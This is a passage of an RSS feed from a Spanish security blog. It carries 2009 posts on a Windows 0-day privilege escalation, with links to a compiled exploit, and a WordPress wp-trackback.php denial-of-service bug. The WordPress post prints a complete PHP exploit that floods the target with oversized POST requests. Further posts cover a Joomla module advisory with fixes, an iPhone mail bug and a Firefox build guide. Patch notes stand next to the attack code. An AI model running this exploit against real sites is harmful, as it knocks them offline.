style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://www.youtube.com/v/u8pfXW7crEQ&amp;hl=es_ES&amp;fs=1&amp;" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/u8pfXW7crEQ&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>Para Windows <a
href="http://www.dragonjar.org/tag/xp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XP">XP</a>:</p><p
style="text-align: center;"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://www.youtube.com/v/u7Y6d-BVwxk&amp;hl=es_ES&amp;fs=1&amp;" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/u7Y6d-BVwxk&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>Ya existe un <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> publicado para este <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> que funciona correctamente incluso en Windows 7, puedes encontrar el <a
href="http://downloads.securityfocus.com/vulnerabilities/exploits/37864.zip">código fuente en este enlace</a>, o el <a
href="http://www.4shared.com/file/202590202/dddbdf3f/0DayWin2__wwwDragonJARorg_.html">exploit compilado aquí</a>, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://www.hispasec.com/unaaldia/4106">Grave vulnerabilidad en Windows permite elevar privilegios</a><br
/> <a
href="http://www.genbeta.com/windows/vulnerabilidad-muy-critica-en-todas-las-versiones-de-windows">Vulnerabilidad muy crítica en todas las versiones de Windows</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a
href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title="Recuperar contraseña windows 7, Vista, XP y Anteriores">Recuperar contraseña windows 7, Vista, XP y Anteriores</a></li><li><a
href="http://www.dragonjar.org/dentro-del-corazon-de-windows-server-2008.xhtml" title="Dentro del corazón de Windows Server 2008">Dentro del corazón de Windows Server 2008</a></li><li><a
href="http://www.dragonjar.org/guia-de-seguridad-de-windows-server-2003-2.xhtml" title="Guia de Seguridad de Windows Server 2003">Guia de Seguridad de Windows Server 2003</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Denegacion de Servicio en WordPress</title><link>http://www.dragonjar.org/dos-en-wordpress.xhtml</link> <comments>http://www.dragonjar.org/dos-en-wordpress.xhtml#comments</comments> <pubDate>Sun, 18 Oct 2009 21:26:41 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Vulnerable]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3246</guid> <description><![CDATA[Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio. El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Jose Carlos Norte</a> acaba de publicar en su blog, un nuevo fallo de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> descubierto en el popular <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">wordpress</a>, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> causando una denegacion de servicio.</p><p
style="text-align: center;"><img
class="alignnone" title="Denegacion de Servicio WordPress" src="http://farm3.static.flickr.com/2715/4027319134_4ef81cac76_o.jpg" alt="4027319134 4ef81cac76 o Denegacion de Servicio en WordPress" width="256" height="222" /></p><p>El <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> se encuentra en el archivo <strong>wp-trackback.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a></strong> quien no valida adecuadamente la variable <strong>$charset</strong>, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un  gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.<span
id="more-3246"></span></p><p>Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress <a
href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">tampoco lo soluciona</a>), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con <strong>mod_security</strong>, no seria <a
href="http://www.dragonjar.org/tag/vulnerable" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerable">vulnerable</a> ya que  bloquearía estas peticiones mal intencionadas,  también se pueden mitigar los daños con una adecuada configuración del parámetro <strong>php_memory_limit</strong> del <strong>php.ini</strong> para evitar que tus desarrollos <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress <a
title="Enlace permanente a WordPress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">WordPress Security Whitepaper</a>) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.</p><p>Les dejo la solución propuesta por Jose Carlos en su blog para este problema:</p><blockquote><p><code>Reemplazar en la linea 45 del archivo wp-trackback.php esto<br
/> <strong>$charset = $_POST['charset'];</strong></code></p><p>por esto<br
/> <strong>$charset =</strong> str_replace(”,”,”&#8221;,<strong>$_POST['charset']</strong>)<strong>;<br
/> </strong>if(is_array($charset)) { exit; }</p></blockquote><p>Y el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> para verificar que somos vulnerables:</p><blockquote><p><code>&lt;?php<br
/> //wordpress Resource exhaustion Exploit<br
/> //http://rooibo.wordpress.com/<br
/> //security@wordpress.org contacted and get a response,<br
/> //but no solution available.<br
/> if(count($argv) &lt; 2) {<br
/> echo “You need to specify a url to attack\n”;<br
/> exit;<br
/> }</code></p><p>$url = $argv[1];</p><p>$data = parse_url($url);<br
/> if(count($data) &lt; 2) {     echo “The url should have http:// in front of it, and should be complete.\n”;     exit;     }     if(count($data) == 2) {     $path = ”;     } else {     $path = $data['path'];     }     $path = trim($path,’/&#8217;);     $path .= ‘/wp-trackback.php’;     if($path{0} != ‘/’) {     $path = ‘/’.$path;     }     $b = “”;     $b = str_pad($b,140000,’ABCEDFG’);     $b = utf8_encode($b);     $charset = “”;     $charset = str_pad($charset,140000,”UTF-8,”);     $str = ‘charset=’.urlencode($charset);     $str .= ‘&amp;url=www.example.com’;     $str .= ‘&amp;title=’.$b;     $str .= ‘&amp;blog_name=lol’;     $str .= ‘&amp;excerpt=lol’;     $count = 0;     while(1) {     $fp = @fsockopen($data['host'],80);     if(!$fp) {     if($count &gt; 0) {<br
/> echo “down!!!!\n”;<br
/> exit;<br
/> }<br
/> echo “unable to connect to: “.$data['host'].”\n”;<br
/> exit;<br
/> }</p><p>fputs($fp, “POST $path HTTP/1.1\r\n”);<br
/> fputs($fp, “Host: “.$data['host'].”\r\n”);<br
/> fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);<br
/> fputs($fp, “Content-length: “.strlen($str).”\r\n”);<br
/> fputs($fp, “Connection: close\r\n\r\n”);<br
/> fputs($fp, $str.”\r\n\r\n”);</p><p>echo “hit!\n”;<br
/> $count++;<br
/> }</p><p>?&gt;</p></blockquote><p><strong>Para mas informacion:</strong><br
/> <a
title="Enlace Permanente a &quot;Agujero de seguridad muy grave en WordPress&quot;" rel="bookmark" href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Agujero de seguridad muy grave en WordPress</a><br
/> <a
id="thread_title_8527" href="http://comunidad.dragonjar.org/f150/atencion-bug-wordpress-8527/">Atención! BUG WordPress</a><br
/> <a
title="Enlace permanente a WordPress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">WordPress Security Whitepaper </a></p><div
id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 996px; width: 1px; height: 1px;">$charset = $_POST['charset'];</div><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/entrar-en-facebook-de-otra-persona.xhtml" title="como entrar al facebook de otra persona">como entrar al facebook de otra persona</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml" title="Lista de tareas para revisar la seguridad en proyectos PHP">Lista de tareas para revisar la seguridad en proyectos PHP</a></li><li><a
href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/dos-en-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Bug en el modulo Quick Question de Joomla</title><link>http://www.dragonjar.org/bug-quick-question-joomla.xhtml</link> <comments>http://www.dragonjar.org/bug-quick-question-joomla.xhtml#comments</comments> <pubDate>Sun, 30 Aug 2009 06:23:34 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[General]]></category> <category><![CDATA[Auditoria]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Joomla]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3038</guid> <description><![CDATA[Gracias a PwnTnT en el foro me entero que el Centro de Estudios Superiores en Alta Tecnología en México realizo una especie de auditoria en el modulo Quick Question de Joomla encontrando mas de 7 fallos de seguridad en el mismo. Algunas de las vulnerabilidades encontradas en este modulo de joomla son: Log&#8217;s Poisoning Massive [...]]]></description> <content:encoded><![CDATA[<p>Gracias a <a
rel="nofollow" href="http://comunidad.dragonjar.org/members/pwntnt/">PwnTnT</a> en el foro me entero que el <a
onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_ccat_edu_mx');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ccat.edu.mx" target="_blank">Centro de Estudios Superiores en Alta Tecnología</a> en México realizo una especie de <a
href="http://www.dragonjar.org/tag/auditoria" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Auditoria">auditoria</a> en el modulo Quick Question de <a
href="http://www.dragonjar.org/tag/joomla" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Joomla">Joomla</a> encontrando mas de 7 fallos de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> en el mismo.</p><p
style="text-align: center;"><img
class="alignnone" src="http://img17.imageshack.us/img17/9471/joomlalogo.png" alt="joomlalogo Bug en el modulo Quick Question de Joomla" width="300" height="205" title="Bug en el modulo Quick Question de Joomla" /></p><p>Algunas de las <a
href="http://www.dragonjar.org/tag/vulnerabilidades" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidades">vulnerabilidades</a> encontradas en este modulo de joomla son:</p><ol><li> Log&#8217;s Poisoning</li><li> Massive Mail Sending</li><li> Visible Log&#8217;s</li><li> <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a></li><li> Email Bombing</li><li> LFI</li><li> y muchas mas</li></ol><p><span
id="more-3038"></span>Podemos ver un vídeo donde se explota algunas de las vulnerabilidades de este modulo de Joomla</p><p
align="center"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://www.youtube.com/v/o3th4dZLX9k&amp;hl=es&amp;fs=1" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/o3th4dZLX9k&amp;hl=es&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>La misma gente del <a
onclick="pageTracker._trackPageview ('/salientes/http_anonym_url_com_go_php_to_http_www_ccat_edu_mx');" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.ccat.edu.mx" target="_blank">Centro de Estudios Superiores en Alta Tecnologia</a> ha publicado un parche temporal para solucionar estos fallos de seguridad, solo es necesario crear .htacces en la carpeta donde se ubica el archivo quickQuestionLog.txt, con el siguiente contenido:</p><p><code>RewriteCond %{REQUEST_URI} ^(quickQuestionLog.txt) [NC]<br
/> RewriteRule ^.*$ - [F,L]</code></p><p>y colocar el siguiente código al inicio del archivo mod_quick_question_sendform.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a>:</p><p><code>foreach($_REQUEST as $key =&gt; $value) $_REQUEST[$key] = htmlentities($value);</code></p><p>Puedes <a
href="http://www.ccat.edu.mx/advisors/advisor2/poc.rar">descargar una prueba de concepto y el full advisory de aqui</a>.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://www.ccat.edu.mx/index.php?option=com_content&amp;view=article&amp;id=117:ccat-reserch-labs-advisor-no-2&amp;catid=50:advisor-&amp;Itemid=78">CCAT Research Lab`s &#8211; Advisor No. 2</a><br
/> <a
href="http://comunidad.dragonjar.org/f154/nuevos-bugs-en-joomla-8224/">Post en el foro</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a
href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/entrevista-a-andres-ormaza-sobre-la-ley-1273-y-habeas-data.xhtml" title="Entrevista a Andrés Ormaza sobre la ley 1273 y Habeas Data">Entrevista a Andrés Ormaza sobre la ley 1273 y Habeas Data</a></li><li><a
href="http://www.dragonjar.org/wifiway-2-0-1.xhtml" title="WifiWay 2.0.3 FINAL">WifiWay 2.0.3 FINAL</a></li><li><a
href="http://www.dragonjar.org/laboratorio-practico-de-auditoria-y-pentest.xhtml" title="Laboratorio Práctico de Auditoria y Pentest">Laboratorio Práctico de Auditoria y Pentest</a></li><li><a
href="http://www.dragonjar.org/0day-en-google-chrome.xhtml" title="0day en Google Chrome">0day en Google Chrome</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/bug-quick-question-joomla.xhtml/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Cuidado con los correos en tu iPhone o iPod Touch</title><link>http://www.dragonjar.org/cuidado-con-los-correos-en-tu-iphone-o-ipod-touch.xhtml</link> <comments>http://www.dragonjar.org/cuidado-con-los-correos-en-tu-iphone-o-ipod-touch.xhtml#comments</comments> <pubDate>Sun, 16 Aug 2009 20:11:55 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Seguridad móvil]]></category> <category><![CDATA[Actualizaciones]]></category> <category><![CDATA[Apple]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Correo]]></category> <category><![CDATA[IPhone]]></category> <category><![CDATA[Ipod Touch]]></category> <category><![CDATA[Mac]]></category> <category><![CDATA[Mensajes]]></category> <category><![CDATA[OS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2999</guid> <description><![CDATA[Si tienes un iPhone o un iPod Touch con firmware 3.0, debes tener cuidado con los correos que &#8220;borras&#8221; desde el, ya que recientemente el investigador Matt Janssen ha descubierto un fallo en esta versión del iPhone OS que permite &#8220;revivir&#8221; correos eliminados previamente desde tu dispositivo, incluso si este ha sido eliminado del servidor [...]]]></description> <content:encoded><![CDATA[<p>Si tienes un <a
href="http://www.dragonjar.org/tag/iphone" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con IPhone">iPhone</a> o un <a
href="http://www.dragonjar.org/tag/ipod-touch" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ipod Touch">iPod Touch</a> con firmware 3.0, debes tener cuidado con los correos que &#8220;borras&#8221; desde el, ya que recientemente el investigador Matt Janssen ha descubierto un fallo en esta versión del <a
href="http://www.dragonjar.org/tag/iphone" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con IPhone">iPhone</a> <a
href="http://www.dragonjar.org/tag/os" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con OS">OS</a> que permite &#8220;revivir&#8221; correos eliminados previamente desde tu dispositivo, incluso si este ha sido eliminado del servidor de <a
href="http://www.dragonjar.org/tag/correo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Correo">correo</a> y el cliente.</p><p>Pueden ver el <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> funcionando en el siguiente vídeo:</p><p
align="center"><object
classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowscriptaccess" value="always" /><param
name="src" value="http://www.youtube.com/v/cKiWS_4Z51w&amp;hl=en&amp;fs=1&amp;" /><param
name="allowfullscreen" value="true" /><embed
type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/cKiWS_4Z51w&amp;hl=en&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>El bug se encuentra en el Spotlight del iPhone o iPod Touch, que no sincroniza adecuadamente el estado de los <a
href="http://www.dragonjar.org/tag/mensajes" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mensajes">mensajes</a> con el cliente de e-mail ni con el servidor de correo, guardando un cache de los <a
href="http://www.dragonjar.org/tag/mensajes" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mensajes">mensajes</a> y permitiendo &#8220;revivir&#8221; cualquier correo que hayas recibido desde tu dispositivo.</p><p>Esto sumado a otros <a
href="http://www.woot.com/Blog/ViewEntry.aspx?Id=8475">12 bugs encontrados en el Firmware 3.0 del iPhone OS</a> nos hace pensar que estamos a puertas de una nueva actualización de este firmware, es recomendable <a
href="http://www.apple.com/iphone/softwareupdate/">entonces estar pendientes de las actualizaciones del iPhone OS</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/desbloquea-jailbreak-firmware-3-1-2-iphone-y-ipod-touch.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch</a></li><li><a
href="http://www.dragonjar.org/desbloquea-o-actualiza-el-iphone-os-3-0.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch</a></li><li><a
href="http://www.dragonjar.org/las-peores-contrasenas-para-el-iphone-ipod-o-ipad.xhtml" title="Las peores Contraseñas para el iPhone, iPod o iPad ">Las peores Contraseñas para el iPhone, iPod o iPad </a></li><li><a
href="http://www.dragonjar.org/recuperar-el-codigo-contrasena-de-iphone-ipod-touch-o-ipad.xhtml" title="Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad">Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad</a></li><li><a
href="http://www.dragonjar.org/descargar-firmware-ios-para-iphone-ipod-touch-ipad-y-apple-tv.xhtml" title="Descargar Firmware (iOS) para iPhone, iPod Touch, iPad y Apple TV">Descargar Firmware (iOS) para iPhone, iPod Touch, iPad y Apple TV</a></li><li><a
href="http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad">Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/soporte-para-flash-y-java-en-el-iphone-ipod-touch.xhtml" title="Soporte para Flash y JAVA en el iPhone / iPod Touch">Soporte para Flash y JAVA en el iPhone / iPod Touch</a></li><li><a
href="http://www.dragonjar.org/instalar-android-en-el-iphone-o-ipod-touch.xhtml" title="Instalar Android en el iPhone o iPod Touch">Instalar Android en el iPhone o iPod Touch</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/cuidado-con-los-correos-en-tu-iphone-o-ipod-touch.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Solucionar crashes inesperados de Firefox 3.5</title><link>http://www.dragonjar.org/solucionar-crashes-inesperados-de-firefox-3-5.xhtml</link> <comments>http://www.dragonjar.org/solucionar-crashes-inesperados-de-firefox-3-5.xhtml#comments</comments> <pubDate>Fri, 14 Aug 2009 15:27:43 +0000</pubDate> <dc:creator>Cortex</dc:creator> <category><![CDATA[COMOs]]></category> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Archlinux]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Firefox]]></category> <category><![CDATA[Xulrunner]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2966</guid> <description><![CDATA[He tenido bastantes problemas con Firefox 3.5 en mi Arch. En Gentoo, me funciona perféctamente y nunca he tenido ni un sólo problema con su desempeño, funciona perféctamente; en Arch es complétamente diferente, haciendo cosas normales como revisar el correo electrónico o ver un video en Youtube se cierra sin ningún motivo aparente y sólo [...]]]></description> <content:encoded><![CDATA[<p>He tenido bastantes problemas con <a
href="http://www.dragonjar.org/tag/firefox" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Firefox">Firefox</a> 3.5 en mi Arch. En Gentoo, me funciona perféctamente y nunca he tenido ni un sólo problema con su desempeño, funciona perféctamente; en Arch es complétamente diferente, haciendo cosas normales como revisar el <a
href="http://www.dragonjar.org/tag/correo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Correo">correo</a> electrónico o ver un video en Youtube se cierra sin <em>ningún motivo aparente</em> y sólo en algunas de las ocasiones recupera las pestañas que tenía abiertas.</p><p>Intenté compilando Firefox y no hacer uso del <strong>pkg.tar.gz</strong> que encuentras en los repositorios <strong>extra</strong>, pero sin ningún resultado.. seguían los mismos fallos. Recordé que Firefox hace uso de <strong><a
href="http://www.dragonjar.org/tag/xulrunner" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Xulrunner">Xulrunner</a></strong> (entorno de ejecución) así que me dispuse a recompilarlo y he ahí la solución <img
src='http://www.dragonjar.org/wp-includes/images/smilies/icon_smile.gif' alt="icon smile Solucionar crashes inesperados de Firefox 3.5" class='wp-smiley' title="Solucionar crashes inesperados de Firefox 3.5" /> <span
id="more-2966"></span></p><p>Voy a mostrar como realizar el proceso en la distribución <strong>Arch Linux</strong> haciendo uso de <strong>ABS.</strong> Lo más probable es que en tu distribución funcione corréctamente ó sino, te toca compilar <em>a mano</em>.</p><p><strong>1.</strong> Instalar <strong>ABS.</strong> ABS es el Sistema de Construcción de Arch (Arch Building System) el cual permite construir y empaquetar paquetes partiendo de su código fuente (al estilo de los ports *BSD). Haciendo uso de <strong>pacman</strong> podemos instalar el paquete que hemos generado.</p><p
style="padding-left: 30px;"><code>pacman -S abs</code></p><p><strong>2. </strong>Editemos los flags de compilación para ajustarlo a nuestra arquitectura. No pienso profundizar en esto, ya que es un largo tema (<em>man gcc</em>), digamos a modo resumido que haciendo eso podemos optimizar los binarios que generamos y <em>obtener un mejor desempeño</em> (no siempre es así). Es muy importante tener bien las <strong>CFLAGS</strong>, sino puede que los programas no tenga el funcionamiento esperado, <a
title="CFLAGS y libgcrypt" href="http://vierito.es/wordpress/2009/06/19/cflags-y-libgcrypt/">como nos explica Javi</a>. <a
title="Safe CFLAGS" href="http://wiki.archlinux.org/index.php/Safe_Cflags">Aquí encuentras CFLAGS para tu arquitectura que está comprobado su buen funcionamiento</a>.</p><p
style="padding-left: 30px;"><code>nano /etc/makepkg.conf</code></p><p><strong>3.</strong> Actualizamos el árbol ABS. Como root:</p><p
style="padding-left: 30px;"><code>abs</code></p><p><strong>4.</strong> Creemos un directorio en nuestro home en el cual realizaremos las labores de compilación:</p><p
style="padding-left: 30px;"><code>mkdir ~/abs</code></p><p><strong>5.</strong> Copiemos los ABS a nuestro directorio:</p><p
style="padding-left: 30px;"><code>cp -r /var/abs/extra/firefox ~/abs<br
/> cp -r /var/abs/extra/xulrunner ~/abs</code></p><p><strong>6.</strong> Ahora compilemos <strong>xulrunner</strong>:</p><p
style="padding-left: 30px;"><code>cd ~/abs/xulrunner<br
/> makepkg</code></p><p><strong>Nota:</strong> Eso se te llevará un buen rato, dependiendo de los parametros de compilación que hayas definido anteriormente y del hardware de tu equipo. En mi caso se ha tomado 20 minutos, pero lo he compilado también en otros equipos y se ha tomado hasta <strong>45 minutos.</strong></p><p><strong>6. </strong>Si todo ha salido bien ya deberíamos de tener un archivo con nombre <em>xulrunner-xxxx-arch-.pkg.tar.gz</em>. Ese es el precompilado que hemos generado que instalaremos posteriormente con pacman. Ahora compilemos Firefox (este si se lleva muy poco tiempo). Para evitar tener que descargar de nuevo el código fuente (unos 45 MB) simplemente lo copiamos al directorio de Firefox:</p><p
style="padding-left: 30px;"><code>cp ~/abs/xulrunner/firefox*.tar.bz2 ~/abs/firefox/<br
/> cd ~/abs/firefox<br
